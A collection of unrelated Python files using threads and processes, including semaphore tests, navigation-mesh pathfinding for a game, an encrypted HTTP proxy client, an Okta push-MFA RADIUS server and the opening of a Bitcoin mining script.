def attach_winch_signal_handler(
handler: Callable[[], None]
) -> Generator[None, None, None]:
"""
Attach the given callback as a WINCH signal handler within the context
manager. Restore the original signal handler when done.
The `Suite.run` method will register SIGWINCH, so that it will
properly repaint when the terminal window resizes. However, using
`run_in_terminal`, we can temporarily send an application to the
background, and run an other app in between, which will then overwrite the
SIGWINCH. This is why it's important to restore the handler when the app
terminates.
"""
# The tricky part here is that signals are registered in the Unix event
# loop with a wakeup fd, but another application could have registered
# signals using signal.signal directly. For now, the implementation is
# hard-coded for the `asyncio.unix_events._UnixSelectorEventLoop`.
# No WINCH? Then don't do anything.
sigwinch = getattr(signal, "SIGWINCH", None)
if sigwinch is None or not in_main_thread():
yield
return
# Keep track of the previous handler.
# (Only UnixSelectorEventloop has `_signal_handlers`.)
loop = asyncio.get_event_loop()
previous_winch_handler = getattr(loop, "_signal_handlers", {}).get(sigwinch)
try:
loop.add_signal_handler(sigwinch, handler)
yield
finally:
# Restore the previous signal handler.
loop.remove_signal_handler(sigwinch)
if previous_winch_handler is not None:
loop.add_signal_handler(
sigwinch,
previous_winch_handler._callback,
*previous_winch_handler._args,
)
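# A minimal, hedged usage sketch of the pattern documented in the `Suite`
# docstring above (illustrative only, not part of the original module). It
# assumes that `KeyBinder`, already imported locally in `_do_wait_for_enter`,
# is the public helper for building key bindings. No layout is passed, so the
# dummy layout is used; press 'q' to exit. A caller that already owns an event
# loop could instead use `demo_app.run(in_thread=True)`, as described in `run`.
if __name__ == "__main__":
    from quo.keys import KeyBinder

    _kb = KeyBinder()

    @_kb.add("q")
    def _quit(event: E) -> None:
        "Exit the demo application when 'q' is pressed."
        event.app.exit()

    demo_app: Suite[None] = Suite(bind=_kb)
    demo_app.run()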
|
asynchronous.py
|
import threading
def asynchronously(callback):
def _wrapped(*args, **kwargs):
thread = threading.Thread(target=callback, args=args, kwargs=kwargs, daemon=True)
thread.start()
return {}
return _wrapped
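# Illustrative usage (a minimal sketch, not part of the original module): the
# decorated callable returns immediately with an empty dict while the real work
# runs on a daemon thread.
if __name__ == "__main__":
    import time

    @asynchronously
    def slow_greeting(name):
        time.sleep(1)
        print("hello,", name)

    print(slow_greeting("world"))  # prints {} right away
    time.sleep(2)  # keep the main thread alive long enough for the daemon thread to finish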
|
test_semaphore.py
|
import unittest
from typing import Callable, List
from threading import Thread
from tests.tests_utils import check_message
from homework.homework6.semaphore import Semaphore
def run_threads(number_of_threads: int, function: Callable):
threads = [Thread(target=function) for _ in range(number_of_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class SemaphoreRaisesTestCase(unittest.TestCase):
def test_incorrect_semaphore_size(self):
with self.assertRaises(ValueError) as context:
Semaphore(-206)
self.assertTrue(check_message(context, "Semaphore initial size must be >= 0"))
class SemaphoreIncrementTestCase(unittest.TestCase):
def setUp(self) -> None:
self.semaphore = Semaphore()
self.count = 0
def increment(self):
for i in range(100_000):
with self.semaphore:
self.count += 1
def increment_with_long_critical_section(self):
with self.semaphore:
for i in range(100_000):
self.count += 1
def test_increment_1_thread(self):
run_threads(1, self.increment)
self.assertEqual(self.count, 100_000)
def test_increment_10_threads(self):
run_threads(10, self.increment)
self.assertEqual(self.count, 100_000 * 10)
def test_increment_with_long_critical_section_1_thread(self):
run_threads(1, self.increment_with_long_critical_section)
self.assertEqual(self.count, 100_000)
def test_increment_with_long_critical_section_10_threads(self):
run_threads(10, self.increment_with_long_critical_section)
self.assertEqual(self.count, 100_000 * 10)
class SemaphoreSquareTestCase(unittest.TestCase):
def setUp(self) -> None:
self.semaphore = Semaphore()
self.numbers: List[int] = []
self.result: List[int] = []
def square(self):
while True:
with self.semaphore:
if self.numbers:
self.result.append(self.numbers.pop(0) ** 2)
else:
return
def test_1_number_1_thread(self):
self.numbers.append(104)
run_threads(1, self.square)
self.assertEqual(self.result, [104 ** 2])
def test_1_number_10_threads(self):
self.numbers.append(172)
run_threads(10, self.square)
self.assertEqual(self.result, [172 ** 2])
def test_many_numbers_1_thread(self):
self.numbers.extend(range(100_000))
run_threads(1, self.square)
self.assertEqual(self.result, list(map(lambda x: x ** 2, range(100_000))))
def test_many_numbers_10_thread(self):
self.numbers.extend(range(100_000))
run_threads(10, self.square)
self.assertEqual(self.result, list(map(lambda x: x ** 2, range(100_000))))
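# Illustrative entry point (an assumption, not part of the original file): lets
# the module be run directly as well as being collected by a test runner.
if __name__ == "__main__":
    unittest.main()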
|
ContentWorker.py
|
from app.api.engines.ContentEngine import ContentEngine
from multiprocessing import Process
class ContentWorker(object):
def _start_process(self, target, args):
process = Process(target=target, args=args)
process.daemon = True
process.start()
def train_item(self, item_id):
self._start_process(ContentEngine().train_item, (item_id, ))
def train(self):
self._start_process(ContentEngine().train, ())
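# Hedged usage sketch (not part of the original module). It assumes ContentEngine
# is importable and configured in this environment; `42` is a hypothetical item id.
# Each call forks a daemon process, so the caller returns immediately.
if __name__ == "__main__":
    import time

    worker = ContentWorker()
    worker.train_item(42)  # retrain a single item in a background process
    worker.train()         # retrain everything in another background process
    # Daemon processes are killed when the parent exits; a long-lived caller
    # (e.g. a web app) would not need this sleep.
    time.sleep(10)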
|
ai.py
|
from direct.showbase.DirectObject import DirectObject
from pandac.PandaModules import *
from random import randint, random, choice
import math
import sys
import engine
import entities
import net
import components
import controllers
import threading
import time
ACCURACY = 0.7 # Relative probability of an AI droid hitting its target.
currentWorld = None
pathRequests = []
pathFindThread = None
class PathRequest:
def __init__(self, callback, aiNode, targetAiNode, position, targetPosition, radius):
self.callback = callback
self.aiNode = aiNode
self.targetAiNode = targetAiNode
self.position = position
self.targetPosition = targetPosition
self.radius = radius
def init():
global pathFindThread
pathFindThread = threading.Thread(target = pathWorker)
pathFindThread.setDaemon(True)
pathFindThread.start()
def pathWorker():
global pathRequests, currentWorld
while True:
if len(pathRequests) > 0:
req = pathRequests.pop(0)
req.callback(currentWorld.navMesh.findPathFromNodes(req.aiNode, req.targetAiNode, req.position, req.targetPosition, req.radius))
del req
if len(pathRequests) > 5:
del pathRequests[:]
time.sleep(0.01)
def requestPath(callback, aiNode, targetAiNode, position, targetPosition, radius):
request = PathRequest(callback, aiNode, targetAiNode, position, targetPosition, radius)
pathRequests.append(request)
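# Hedged illustration of the request/callback pattern above (not part of the
# original module). `droid` and its attributes are hypothetical stand-ins for a
# real controller; note that the callback runs on the path-finding worker thread.
def _examplePathRequest(droid, targetPos, radius = 1):
    "Queue an asynchronous path request from a droid's position to targetPos."
    targetNode = currentWorld.navMesh.getNode(targetPos, radius)
    if targetNode == None:
        return  # target is off the nav mesh; nothing to request
    def onPathReady(path):
        # `path` is a Path instance, or None if no route was found.
        if path != None:
            droid.setPath(path)  # assumption: the caller stores the path for steering
    requestPath(onPathReady, droid.currentNode, targetNode, droid.getPosition(), targetPos, radius)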
class World:
"""The AI world models the world using a navigation mesh. AI entities navigate between edges in the mesh using an A* search algorithm.
The AI world also contains the ODE world and space, and includes functions to test for collisions."""
def __init__(self):
"Initializes the ODE world and space."
global currentWorld
currentWorld = self
self.grids = dict()
self.navMesh = None
self.spawnPoints = []
self.docks = []
if base.cTrav == 0:
self.traverser = CollisionTraverser("collision_traverser")
base.cTrav = self.traverser
else:
self.traverser = base.cTrav
self.traverser.clearColliders()
# Setup the physics world
self.world = OdeWorld()
# Create a space and add a contactgroup to it to add the contact joints
self.space = OdeHashSpace()
self.space.setAutoCollideWorld(self.world)
self.contactGroup = OdeJointGroup()
self.space.setAutoCollideJointGroup(self.contactGroup)
self.space.setCollisionEvent("physicsCollision")
self.world.setGravity(0, 0, -35)
# Surface IDs: 0 - ground 1 - objects 2 - actors
self.world.initSurfaceTable(3)
self.world.setSurfaceEntry(0, 1, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(1, 1, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(1, 2, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(0, 2, 10.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(2, 2, 0.2, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(0, 0, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
def update(self):
"Steps the ODE simulation."
self.space.autoCollide()
self.world.quickStep(engine.clock.timeStep)
self.contactGroup.empty() # Clear the contact joints
def getNearestDroid(self, entityGroup, pos):
"Gets an entity on any opposing team with the smallest straight-line distance from the specified position."
distance = -1
droid = None
for entity in (x for x in entityGroup.entities.values() if isinstance(x, entities.BasicDroid)):
vector = pos - entity.getPosition()
if vector.length() < distance or distance == -1:
distance = vector.length()
droid = entity
return droid
def getNearestEnemy(self, entityGroup, pos, team, includeCloakedUnits = False):
"Gets an entity on any opposing team with the smallest straight-line distance from the specified position."
distance = -1
enemy = None
for entity in (x for x in entityGroup.entities.values() if isinstance(x, entities.BasicDroid) and ((not x.cloaked) or includeCloakedUnits) and (not team.isAlly(x.getTeam()))):
vector = pos - entity.getPosition()
if vector.length() < distance or distance == -1:
distance = vector.length()
enemy = entity
return enemy
def getNearestDropPod(self, entityGroup, pos):
"Gets the nearest drop pod."
distance = -1
pod = None
for entity in (x for x in entityGroup.entities.values() if isinstance(x, entities.DropPod)):
vector = pos - entity.getPosition()
if vector.length() < distance or distance == -1:
distance = vector.length()
pod = entity
return pod
def getNearestSpawnPoint(self, pos):
lowestDistance = -1
returnValue = None
for point in self.spawnPoints:
vector1 = pos - point.getPosition()
dist = vector1.length()
if dist < lowestDistance or lowestDistance == -1:
lowestDistance = dist
returnValue = point
return returnValue
def getNearestDock(self, pos):
lowestDistance = -1
returnValue = None
for point in self.docks:
vector1 = pos - point.getPosition()
dist = vector1.length()
if dist < lowestDistance or lowestDistance == -1:
lowestDistance = dist
returnValue = point
return returnValue
def getNearestOpenSpawnPoint(self, team, entityGroup, pos, minRadius = 50):
dockList = [team.dock] if team.dock != None else []
points = sorted(dockList + self.spawnPoints, key = lambda x: (x.getPosition() - pos).length())
enemies = [x for x in entityGroup.entities.values() if isinstance(x, entities.Actor) and x.getTeam() != team]
for point in points:
p = point.getPosition()
open = True
for enemy in enemies:
if (enemy.getPosition() - p).length() < minRadius:
open = False
break
if open:
return p
return points[0].getPosition()
def getRandomSpawnPoint(self, zombieSpawnsOnly = False, team = None):
if zombieSpawnsOnly:
spawns = self.spawnPoints[1:]
else:
spawns = self.spawnPoints[:]
if team != None and team.dock != None:
spawns.append(team.dock)
return choice(spawns).getPosition()
def getRandomOpenSpawnPoint(self, team, entityGroup, minRadius = 50, zombieSpawnsOnly = False):
if zombieSpawnsOnly:
spawns = self.spawnPoints[1:]
else:
spawns = self.spawnPoints[:]
if team != None and team.dock != None:
spawns.append(team.dock)
goodSpawns = []
enemies = [x for x in entityGroup.entities.values() if isinstance(x, entities.Actor) and x.getTeam() != team]
for point in spawns:
p = point.getPosition()
open = True
for enemy in enemies:
if (enemy.getPosition() - p).length() < minRadius:
open = False
break
if open:
goodSpawns.append(point)
if len(goodSpawns) == 0:
return spawns[0].getPosition()
else:
return choice(goodSpawns).getPosition()
def getRayCollisionQueue(self, rayNP, node = None):
"""Gets a CollisionHandlerQueue containing all collisions along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
queue = CollisionHandlerQueue()
self.traverser.addCollider(rayNP, queue)
if node == None:
self.traverser.traverse(engine.renderLit)
else:
self.traverser.traverse(node)
self.traverser.clearColliders()
queue.sortEntries()
return queue
def getCollisionQueue(self, position, direction, node = None):
"""Gets a CollisionHandlerQueue containing all collisions along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
cNode = CollisionNode("cnode")
nodepath = render.attachNewNode(cNode)
cNode.setIntoCollideMask(BitMask32(0))
cNode.setFromCollideMask(BitMask32(1))
ray = CollisionRay(position.getX(), position.getY(), position.getZ(), direction.getX(), direction.getY(), direction.getZ())
cNode.addSolid(ray)
queue = CollisionHandlerQueue()
self.traverser.addCollider(nodepath, queue)
if node == None:
self.traverser.traverse(engine.renderLit)
else:
self.traverser.traverse(node)
self.traverser.clearColliders()
nodepath.removeNode()
queue.sortEntries()
return queue
def getRayFirstCollision(self, rayNP, node = None):
"""Gets a CollisionEntry for the first collision along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
queue = self.getRayCollisionQueue(rayNP, node)
if queue.getNumEntries() > 0:
return queue.getEntry(0)
else:
return None
def getFirstCollision(self, position, direction, node = None):
"""Gets a CollisionEntry for the first collision along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
queue = self.getCollisionQueue(position, direction, node)
if queue.getNumEntries() > 0:
return queue.getEntry(0)
else:
return None
def testCollisions(self, node, traversePath = None):
"Tests for any and all collisions on the specified nodepath."
if traversePath == None:
traversePath = engine.renderLit
queue = CollisionHandlerQueue()
self.traverser.addCollider(node, queue)
self.traverser.traverse(traversePath)
self.traverser.clearColliders()
queue.sortEntries()
return queue
def delete(self):
"Destroys the ODE world. IMPORTANT: do not delete the AI world before deleting the entity group."
for point in self.spawnPoints:
point.delete()
del self.spawnPoints[:]
for dock in self.docks:
dock.delete()
del self.docks[:]
if self.navMesh != None:
self.navMesh.delete()
self.world.destroy()
self.space.destroy()
navMeshCache = dict()
class NavMesh:
def __init__(self, directory, filename):
global navMeshCache
self.edges = []
self.nodes = []
self.filename = filename
if directory + "/" + self.filename in navMeshCache:
navMesh = navMeshCache[directory + "/" + self.filename]
self.edges = navMesh.edges
self.nodes = navMesh.nodes
else:
node = engine.loadModel(directory + "/" + self.filename)
self._processNode(node)
node.removeNode()
navMeshCache[directory + "/" + self.filename] = self
def delete(self):
pass
def _processNode(self, node):
geomNodeCollection = node.findAllMatches('**/+GeomNode')
for nodePath in geomNodeCollection:
geomNode = nodePath.node()
self._processGeomNode(geomNode)
for edge in self.edges:
if len(edge.nodes) <= 1:
# This edge isn't between two nodes, so we don't need to worry about it when pathfinding.
# But we still need it for determining which node an agent is in.
edge.navigable = False
def _processGeomNode(self, geomNode):
for i in range(geomNode.getNumGeoms()):
geom = geomNode.getGeom(i)
state = geomNode.getGeomState(i)
self._processGeom(geom)
def _processGeom(self, geom):
vdata = geom.getVertexData()
for i in range(geom.getNumPrimitives()):
prim = geom.getPrimitive(i)
self._processPrimitive(prim, vdata)
def _processPrimitive(self, prim, vdata):
vertex = GeomVertexReader(vdata, "vertex")
prim = prim.decompose()
def getVertex(index):
vi = prim.getVertex(index)
vertex.setRow(vi)
return vertex.getData3f()
for p in range(prim.getNumPrimitives()):
s = prim.getPrimitiveStart(p)
e = prim.getPrimitiveEnd(p)
for i in range(s, e):
v = getVertex(i)
if i + 1 >= e:
break
v2 = getVertex(i + 1)
edge1 = self.addEdge(v, v2)
if i + 2 >= e:
break
v3 = getVertex(i + 2)
edge2 = self.addEdge(v2, v3)
edge3 = self.addEdge(v3, v)
self.nodes.append(NavNode(edge1, edge2, edge3))
def addEdge(self, v1, v2):
edge = self._checkForEdge(v1, v2)
if edge == None:
edge = Edge(Vec3(v1), Vec3(v2))
self.edges.append(edge)
return edge
def _checkForEdge(self, v1, v2):
epsilon = 0.1
for edge in self.edges:
if (edge.a.almostEqual(v1, epsilon) and edge.b.almostEqual(v2, epsilon)) or (edge.a.almostEqual(v2, epsilon) and edge.b.almostEqual(v1, epsilon)):
return edge
return None
def getNode(self, pos, radius = 1, lastKnownNode = None):
if lastKnownNode != None:
if lastKnownNode.containerTest(pos, radius):
return lastKnownNode
nodes = []
for edge in lastKnownNode.edges:
nodes += [x for x in edge.getNodes() if x != lastKnownNode and x.containerTest(pos, radius)]
if len(nodes) == 0:
nodes = [x for x in self.nodes if x.containerTest(pos, radius)]
else:
nodes = [x for x in self.nodes if x.containerTest(pos, radius)]
size = len(nodes)
if size == 0:
return None
if size > 1:
highest = -100
highestNode = None
for node in nodes:
if node.highest > highest and node.lowest < pos.getZ():
highest = node.highest
highestNode = node
return highestNode
return nodes[0]
def findPath(self, startPos, endPos, radius = 1):
"A* algorithm."
startNode = self.getNode(startPos, radius)
endNode = self.getNode(endPos, radius)
return self.findPathFromNodes(startNode, endNode, startPos, endPos, radius)
def findPathFromNodes(self, startNode, endNode, startPos, endPos, radius = 1):
# Clear pathfinding data
for edge in self.edges:
edge.closed = False
edge.cameFrom = None
edge.gScore = 0
edge.hScore = 0
edge.fScore = 0
edge.open = False
path = Path(startPos, endPos, startNode, endNode, radius)
openEdges = startNode.edges[:]
for edge in startNode.edges:
edge.gScore = 0
edge.hScore = edge.cost(endNode.center)
edge.fScore = edge.hScore
edge.open = True
iterations = 0
while len(openEdges) > 0:
# Sort the open set by fScore. A key function is used here because
# list.sort() no longer accepts a bare comparison function on Python 3.
openEdges.sort(key = lambda edge: edge.fScore)
currentEdge = openEdges.pop(0)
if endNode in currentEdge.nodes:
c = currentEdge
path.add(currentEdge)
while c.cameFrom != None:
c = c.cameFrom
path.add(c)
path.clean()
return path
currentEdge.closed = True
for neighbor in currentEdge.neighbors:
if neighbor.navigable and not neighbor.closed:
tentativeGScore = currentEdge.gScore + currentEdge.costToEdge(neighbor)
tentativeIsBetter = False
if not neighbor.open:
neighbor.open = True
openEdges.append(neighbor)
neighbor.hScore = neighbor.cost(endNode.center)
tentativeIsBetter = True
elif tentativeGScore < neighbor.gScore:
tentativeIsBetter = True
if tentativeIsBetter:
neighbor.cameFrom = currentEdge
neighbor.gScore = tentativeGScore
neighbor.fScore = neighbor.gScore + neighbor.hScore
iterations += 1
if iterations > 9:
time.sleep(0.0)
iterations = 0
return None
class NavNode:
def __init__(self, edge1, edge2, edge3):
self.highest = -10000
self.lowest = 10000
self.edges = []
self.edgeNormals = [] # For containerTest
self.center = Vec3()
for e in [edge1, edge2, edge3]:
self._addEdge(e)
for edge in self.edges:
self.center += edge.a + edge.b
self.center /= len(self.edges) * 2 # Node center is only calculated once.
up = Vec3(0, 0, 1)
for edge in self.edges:
toCenter = edge.center - self.center
toCenter.setZ(0)
toCenter.normalize()
parallel = Vec3(edge.a.getX(), edge.a.getY(), 0) - Vec3(edge.b.getX(), edge.b.getY(), 0)
parallel.setZ(0)
parallel.normalize()
normal = parallel.cross(up)
reverseNormal = normal * -1
if toCenter.dot(normal) < 0:
self.edgeNormals.append(normal)
else:
self.edgeNormals.append(reverseNormal)
def containerTest(self, p, radius = 1):
p2 = Vec3(p.getX(), p.getY(), 0)
if p.getZ() > self.highest + radius + 1 or p.getZ() < self.lowest - radius - 1:
return False
for i in range(len(self.edgeNormals)):
vector = p2 - self.edges[i].flatCenter
vector.normalize()
if vector.dot(self.edgeNormals[i]) < 0:
return False
# To do: vertical test
return True
def _addEdge(self, edge):
if not edge in self.edges:
if edge.a.getZ() < self.lowest:
self.lowest = edge.a.getZ()
if edge.b.getZ() < self.lowest:
self.lowest = edge.b.getZ()
if edge.a.getZ() > self.highest:
self.highest = edge.a.getZ()
if edge.b.getZ() > self.highest:
self.highest = edge.b.getZ()
self.edges.append(edge)
edge.addNode(self)
for e in (x for x in self.edges if x != edge):
edge.addNeighbor(e)
e.addNeighbor(edge)
class Edge:
def __init__(self, v1, v2):
self.a = v1
self.b = v2
self.aToBVector = self.b - self.a
self.aToBVector.normalize()
self.center = (self.a + self.b) / 2
self.flatCenter = Vec3(self.center.getX(), self.center.getY(), 0)
self.neighbors = []
self.nodes = []
# Temporary pathfinding data
self.closed = False
self.open = False
self.cameFrom = None
self.gScore = 0
self.hScore = 0
self.fScore = 0
self.navigable = True
def intersects(self, c, d, radius = 0):
def ccw(u,v,w):
return (w.getY() - u.getY()) * (v.getX() - u.getX()) > (v.getY() - u.getY()) * (w.getX() - u.getX())
a = self.a + (self.aToBVector * radius)
b = self.b - (self.aToBVector * radius)
return ccw(a, c, d) != ccw(b, c, d) and ccw(a, b, c) != ccw(a, b, d)
def addNode(self, node):
if node not in self.nodes:
self.nodes.append(node)
def cost(self, pos):
# The cost is the distance from given point to the closer of our two corners.
dist1 = (self.a - pos).length()
dist2 = (self.b - pos).length()
return min(dist1, dist2)
def costToEdge(self, edge):
# The cost is the distance between the two closest corners of the two edges.
dist1 = (self.a - edge.a).length()
dist2 = (self.b - edge.b).length()
dist3 = (self.a - edge.b).length()
dist4 = (self.b - edge.a).length()
return min(dist1, dist2, dist3, dist4)
def getNodes(self):
return self.nodes
def addNeighbor(self, e):
if not e in self.neighbors:
self.neighbors.append(e)
def getNeighbors(self):
return self.neighbors
class Path:
def __init__(self, start = None, end = None, startNode = None, endNode = None, radius = 0):
self.waypoints = []
self.edges = []
self.nodes = []
if startNode != None and endNode != None:
self.nodes = [endNode, startNode]
self.radius = radius
if start == None:
self.start = None
self.end = None
else:
self.start = Vec3(start)
self.end = Vec3(end)
def clean(self):
i = len(self.waypoints) - 2
while i > 0:
if self.edges[i].intersects(self.waypoints[i - 1], self.waypoints[i + 1], self.radius):
del self.waypoints[i]
del self.edges[i]
i -= 1
def add(self, edge):
self.edges.insert(0, edge)
if len(self.edges) > 1:
for node in edge.nodes:
if node in self.edges[1].nodes:
self.nodes.insert(1, node)
aDist = (edge.a - self.end).length()
bDist = (edge.b - self.end).length()
if len(self.waypoints) > 1:
last = self.waypoints[1]
aDist += (edge.a - last).length()
bDist += (edge.b - last).length()
if aDist < bDist:
self.waypoints.insert(0, edge.a + (edge.aToBVector * self.radius))
else:
self.waypoints.insert(0, edge.b - (edge.aToBVector * self.radius))
def current(self):
if len(self.waypoints) > 0:
return self.waypoints[0]
else:
return None
def next(self):
if len(self.waypoints) > 0:
self.waypoints.pop(0)
return self.current()
def hasNext(self):
return len(self.waypoints) > 1
def last(self):
if len(self.waypoints) > 0:
return self.waypoints[-1]
else:
return None
def clear(self):
del self.waypoints[:]
del self.nodes[:]
del self.edges[:]
|
_re.py
|
import queue
import threading
import time
a = [1, 2, 3]
q = queue.Queue()
q.put(1)
q.put('abc')
# q.put(a)
print(q.get())
print(q.get())
# print(q.get())
def handle(q:queue.Queue):
time.sleep(5)
q.put('xyz')
t = threading.Thread(target=handle, args=(q,))
t.start()  # start the worker thread
print(q.get())  # blocks here until the worker thread puts 'xyz' after ~5 seconds
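# A minimal sketch (not part of the original script): the same q.get() with a bounded wait
# instead of blocking forever; queue.Empty is raised if nothing arrives within the timeout.
try:
    print(q.get(timeout=1))
except queue.Empty:
    print('queue is empty, no result within 1 second')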
|
client.py
|
#!/usr/bin/env python3
#
# The MIT License (MIT)
#
# Copyright shifvb 2015-2016
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import socket
import threading
import logging
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from http_proxy.tools.encrypt import encrypt
from http_proxy.tools.async_IO import read_write
from http_proxy.tools.parse_head import parse_head
from http_proxy.utils import parse_args
from http_proxy.utils import check_ver
from http_proxy.utils import get_time_str
BUFFER_SIZE = 4096
is_local = True
__version__ = (0, 9, 2)
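# Per-connection worker: read the request head from the browser, encrypt it, forward it to the
# remote proxy server, then relay traffic between the two sockets until one side closes.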
def handle_request(client_sock, server_addr: str, server_port: int):
try:
# receive data from client(i.e. browser)
head_data = client_sock.recv(BUFFER_SIZE)
if not head_data:
client_sock.close()
return
parse_head(head_data) # show debug message
encrypted_data = encrypt(head_data) # encrypt data
target_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send encrypted data to server
target_sock.connect((server_addr, server_port))
target_sock.send(encrypted_data)
read_write(client_sock, target_sock) # async communication
target_sock.close() # close socket
except TimeoutError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' time out.'))
except ConnectionAbortedError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' was aborted by client.'))
except ConnectionResetError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' was reseted.'))
except ConnectionRefusedError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' was refused.'))
except socket.gaierror:
logging.error('[ERR] [{}] {:>61}'.format(get_time_str(), "can't CONNECT to server!"))
finally:
client_sock.close()
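# Accept loop: listen on the local address and hand each incoming browser connection to a
# daemon worker thread.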
def client(server_addr: str, server_port: int, local_addr: str, local_port: int):
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.bind((local_addr, local_port))
client_sock.listen(5)
while True:
conn, addr = client_sock.accept()
t = threading.Thread(target=handle_request, args=(conn, server_addr, server_port))
t.daemon = True
t.start()
if __name__ == '__main__':
check_ver()
d = parse_args(is_local, __version__)
print('Target server: {}:{}'.format(d["server_addr"], d["server_port"]))
print('Client listening on {}:{}'.format(d["local_addr"], d["local_port"]))
client(**d)
|
server.py
|
#!/usr/bin/python
from __future__ import print_function
from pyrad.dictionary import Dictionary
from pyrad.server import Server, RemoteHost
from pyrad.packet import AccessReject, AccessAccept
import logging
from okta import OktaAPI, ResponseCodes
import os
import sys
import threading
logging.basicConfig(level="INFO",
format="%(asctime)s [%(levelname)-8s] %(message)s")
logger = logging.getLogger(__name__)
class RadiusServer(Server):
def __init__(self, *args, **kwargs):
self.okta = OktaAPI(url=args[0], key=args[1])
super().__init__(**kwargs)
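    # Per-request handler: strip any DOMAIN\ prefix from User-Name, look the user up in Okta,
    # trigger a push (or async MFA) verification, and reply Access-Accept only if it is approved.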
def auth_handler(self, pkt):
user_name = pkt["User-Name"][0][
pkt["User-Name"][0].find("\\") + 1 if pkt["User-Name"][0].find("\\") > 0 else 0:]
logger.info("Received an authentication request for {}.".format(user_name))
logger.debug("Attributes: ")
for attr in pkt.keys():
logger.debug("%s: %s" % (attr, pkt[attr]))
reply = self.CreateReplyPacket(pkt, **{
"Proxy-State": pkt["Proxy-State"]
})
reply.code = AccessReject
try:
if os.environ.get('OKTA_USE_SAMACCOUNTNAME'):
u = self.okta.get_user_by_samaccountname(user_name)
else:
u = self.okta.get_user_id(user_name)
f = self.okta.get_user_push_factor(u)
if f is not None:
push = self.okta.push_verify(u, f["id"])
if push == ResponseCodes.SUCCESS:
logger.info("Push approved by {}.".format(user_name))
reply.code = AccessAccept
else:
logger.warning("Push was rejected or timed out for {}!".format(user_name))
else:
push = self.okta.push_async_mfa(u)
if push == ResponseCodes.SUCCESS:
logger.info("Push approved by {}.".format(user_name))
reply.code = AccessAccept
else:
logger.warning("Push was rejected or timed out for {}!".format(user_name))
except Exception as e:
logger.exception("There was a problem with the Okta MFA: %s", e)
self.SendReplyPacket(pkt.fd, reply)
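    # Dispatch each Access-Request to its own thread so a slow push verification does not block
    # the packet loop.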
def HandleAuthPacket(self, pkt):
thread = threading.Thread(target=self.auth_handler, args=(pkt, ))
thread.start()
def run():
# Check to make sure env variables are set
if not all(v in os.environ for v in ["OKTA_API_KEY", "OKTA_TENANT", "RADIUS_SECRET", "RADIUS_PORT", "OKTA_WKF_ASYNC_MFA_CREATE_TRANSACTION_URL", "OKTA_WKF_ASYNC_MFA_POLL_TRANSACTION_URL"]):
logger.error("Missing environment variables!")
sys.exit("Missing environment variables!")
# Create server and read the attribute dictionary
srv = RadiusServer(
os.getenv('OKTA_TENANT'),
os.getenv('OKTA_API_KEY'),
dict=Dictionary("dictionary"),
coa_enabled=False,
authport=int(os.getenv('RADIUS_PORT'))
)
# Add clients (address, secret, name)
srv.hosts["0.0.0.0"] = RemoteHost("0.0.0.0", os.getenv("RADIUS_SECRET").encode(), "0.0.0.0")
srv.BindToAddress("")
logger.info("Starting server...")
# Run the RADIUS server
srv.Run()
if __name__ == '__main__':
run()
|
test24.py
|
from threading import get_ident, Thread
import time
# Hand-rolled thread-local storage: a dict keyed by each thread's ident
storage = {}
def set(k, v):
ident = get_ident()
if ident in storage:
storage[ident][k] = v
else:
storage[ident] = {k: v}
def get(k):
ident = get_ident()
return storage[ident][k]
def task(arg):
set('val', arg)
# sleep so every thread has stored its value; each thread then prints its own i
time.sleep(1)
v = get('val')
print(v)
for i in range(10):
t = Thread(target=task, args=(i, ))
t.start()
# Function-based implementation (a threading.local() sketch follows below)
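# A minimal sketch (not part of the original script) of the same per-thread storage using the
# standard library's thread-local object; 'local_data' and 'task2' are illustrative names only.
from threading import local
local_data = local()
def task2(arg):
    local_data.val = arg  # each thread sees its own independent 'val'
    time.sleep(1)
    print(local_data.val)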
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
